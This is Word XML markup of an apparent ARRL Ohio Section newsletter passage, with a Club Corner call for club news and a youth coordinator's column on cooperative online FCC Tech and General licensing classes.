          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ARRL Club News is published every month (12 times each year). ARRL members may subscribe at no cost or unsubscribe by editing their Member Data Page as described at </w:t>
      </w:r>
      <w:hyperlink r:id="rId138" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.arrl.org/club-news</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653BFD79" w14:textId="77777777" w:rsidR="00D86026" w:rsidRPr="00D86026" w:rsidRDefault="00D86026" w:rsidP="00D86026">
      <w:pPr>
        <w:spacing w:before="120" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Copyright © 2021 American Radio Relay League, Incorporated. Use and distribution of this publication, or any portion thereof, is permitted for non-commercial or educational purposes, with attribution. All other purposes require written permission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06586A65" w14:textId="08F6539A" w:rsidR="00080378" w:rsidRDefault="00080378" w:rsidP="00C72034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF1E32E" w14:textId="16A54A4F" w:rsidR="00080378" w:rsidRDefault="00080378" w:rsidP="00C72034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E207012" w14:textId="1D78454C" w:rsidR="00080378" w:rsidRDefault="00080378" w:rsidP="00C72034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A073786" w14:textId="71E9CB05" w:rsidR="00080378" w:rsidRDefault="00080378" w:rsidP="00C72034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311E79A0" w14:textId="77777777" w:rsidR="00080378" w:rsidRDefault="00080378" w:rsidP="00C72034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DCA891" w14:textId="6C3B94A5" w:rsidR="001A71D0" w:rsidRDefault="001A71D0" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C27334" w14:textId="72CA7611" w:rsidR="001A71D0" w:rsidRDefault="001A71D0" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C2064C2" w14:textId="05F8DAA7" w:rsidR="001A71D0" w:rsidRDefault="001A71D0" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_____________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FAA3D" w14:textId="3882984A" w:rsidR="001A71D0" w:rsidRDefault="001A71D0" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05191638" w14:textId="77777777" w:rsidR="001A71D0" w:rsidRDefault="001A71D0" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6AA7E5" w14:textId="3CB96357" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="club"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252673024" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71A5E4EA" wp14:editId="044BE3DE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>24765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1445895" cy="1581150"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21340"/>
                <wp:lineTo x="21344" y="21340"/>
                <wp:lineTo x="21344"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lub corner.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1445895" cy="1581150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Club Corner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B7E4A4" w14:textId="29F4B2F5" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACB495D" w14:textId="5C3BAA51" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">This is YOUR </w:t>
      </w:r>
      <w:r w:rsidR="0033065B" w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>corner</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> of the newsletter. Send </w:t>
      </w:r>
      <w:r w:rsidR="006533A5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> what your club is </w:t>
      </w:r>
      <w:r w:rsidR="006533A5" w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>doing,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="006533A5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">’ll make sure that it gets in. Got a special event or club project that you want everyone to know about? Send it to </w:t>
      </w:r>
      <w:r w:rsidR="006533A5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">!. Need help with a project? Send it to </w:t>
      </w:r>
      <w:r w:rsidR="006533A5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CA29D6" w14:textId="106C5E78" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB3C14B" w14:textId="1D591B67" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Let </w:t>
      </w:r>
      <w:r w:rsidR="00E65607">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> know what you club is up to. Are you going to have a special guest at your meeting or are you having a special anniversary? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561E6F2C" w14:textId="25052052" w:rsidR="00E65607" w:rsidRDefault="00E65607" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4727D4" w14:textId="7E698790" w:rsidR="001E4C86" w:rsidRDefault="00E65607" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00BE7112" w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00BE7112" w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> it to:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId140" w:history="1">
        <w:r w:rsidR="00BE7112" w:rsidRPr="00BE7112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:bCs/>
          </w:rPr>
          <w:t>webmaster@arrl-ohio.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BE7112" w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C5C7E" w14:textId="036FF350" w:rsidR="00414894" w:rsidRDefault="00414894" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7933C00B" w14:textId="214B4793" w:rsidR="00011C90" w:rsidRDefault="00011C90" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6005A738" w14:textId="53ED00DC" w:rsidR="00C72034" w:rsidRDefault="00C72034" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4646D8E1" w14:textId="26FB0B3A" w:rsidR="00C72034" w:rsidRDefault="00C72034" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8B0E53" w14:textId="77777777" w:rsidR="00C72034" w:rsidRDefault="00C72034" w:rsidP="00C72034">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245952BB" w14:textId="77777777" w:rsidR="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">From the Section Youth Coordinator </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C7830A" w14:textId="77777777" w:rsidR="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Anthony Luscre, K8ZT - SYC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFAC577" w14:textId="77777777" w:rsidR="00870109" w:rsidRDefault="0084211F" w:rsidP="00870109">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId141">
        <w:r w:rsidR="00870109">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">k8zt@arrl.net </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08762DDE" w14:textId="77777777" w:rsidR="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38CA43A3" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cooperative Statewide FCC General Licensing Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F06AAD" w14:textId="642DF63F" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:r w:rsidRPr="00870109">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="252960768" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="4DB86BD1" wp14:editId="370D0D9D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3409950</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>271458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3446115" cy="2953813"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
            <wp:docPr id="18" name="image2.png" descr="A group of people in a room&#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8" name="image2.png" descr="A group of people in a room&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3446115" cy="2953813"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00870109">
        <w:t>Many local Amateur Radio clubs often run licensing classes. These are very important to maintaining and increasing the number of licensed hams in the US. They also play an important role in the recruitment of new members into local clubs. Quite often, these classes have only a minimum number of attendees in comparison to the amount of work put in by the club members that teach the classes. They have to find (sometimes also pay rent for) a place for the class and handle other aspects of teaching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D396CBB" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:r w:rsidRPr="00870109">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="252961792" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="0AD00DF7" wp14:editId="6AB46C9B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3524250</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>295275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3448050" cy="2264033"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
            <wp:docPr id="19" name="image1.jpg" descr="A picture containing engineering drawing&#10;&#10;Description automatically generated"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="19" name="image1.jpg" descr="A picture containing engineering drawing&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId143"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3448050" cy="2264033"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0CFB67" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:r w:rsidRPr="00870109">
        <w:t xml:space="preserve">COVID has also been a factor complicating in-person classes. Last year our club, Cuyahoga Falls ARC- </w:t>
      </w:r>
      <w:hyperlink r:id="rId144">
        <w:r w:rsidRPr="00870109">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.cfarc.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00870109">
        <w:t>), decided to take our Tech and General Licensing Classes online. We used Google Meet for online conferencing and Google Classroom to manage the class, distribute materials, provide sample quizzes, share resources, etc. We had a combination of local students, wider-ranging Ohio students and students from three other states. We will be doing this again this year and would like to involve your local club.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60158478" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109"/>
    <w:p w14:paraId="3487D8B8" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:r w:rsidRPr="00870109">
        <w:t xml:space="preserve">Our plan is to do our usual local recruitment of students for the classes, but we would also like to enlist your local club’s help in recruiting candidates from your local area. The big difference is we will refer any students from your area of the state to your local club for membership and, most importantly, in-person mentoring (Elmering). Even if you do not refer to them, if we have students from your area, we would like to know that we can refer them to you for membership and Elmering. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A91DE9D" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109"/>
    <w:p w14:paraId="291609B9" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:r w:rsidRPr="00870109">
        <w:t>What we would like you to do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7FCC22" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Advertise our classes in your newsletter, nets and local media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC70A98" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Let us know that you  are interested in getting referrals to your club</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE45AF" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Take an active role in getting these new licensees on the air and acclimated with Amateur Radio operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF40398" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109"/>
    <w:p w14:paraId="5F3AC0D3" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:r w:rsidRPr="00870109">
        <w:t>What we will do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C044574" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Provide free online Tech and General Class Licensing instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE95512" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Accommodate students from around Ohio and the US of all ages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64717CF6" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Welcome resources, handouts, recordings, guest lecturers, etc. from other clubs</w:t>
      </w:r>
    </w:p>
